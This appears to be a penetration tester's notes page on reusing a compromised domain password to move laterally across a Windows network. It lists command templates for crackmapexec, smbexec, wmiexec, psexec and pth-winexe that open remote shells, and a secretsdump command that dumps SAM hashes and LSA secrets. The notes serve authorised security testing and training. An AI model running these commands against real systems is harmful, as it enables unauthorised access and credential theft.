Skip to main content

Pass the Password

Overview

Cracked a hash or discovered a password for a domain user. Use the password and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential


Attack 1: crackmapexec

sudo crackmapexec smb <target-or-CIDR> -u username -p password -d domain


Example

Pasted image 20211226194815.png

crackmapexec has an array of command line switches as well; some of which include --sam to dump hashes while running the attack.



Attack 2: smbexec.py

smbexec.py 'domain.tld/user.name:password@target'


Attack 3: wmiexec.py

wmiexec.py 'domain.tld/user.name:password@target' cmd.exe


Attack 4: psexec.py

psexec.py 'domain.tld/user.name:password@target' cmd.exe


Attack 5: pth-winexe

pth-winexe --user='domain.tld/user.name%password' //target-ip cmd.exe


Attack 6: secretsdump.py

Dumps SAM hashes from the target and LSA secrets.

secretsdump.py 'domain.tld/user.name:password@target'



Example

Pasted image 20211226200559.png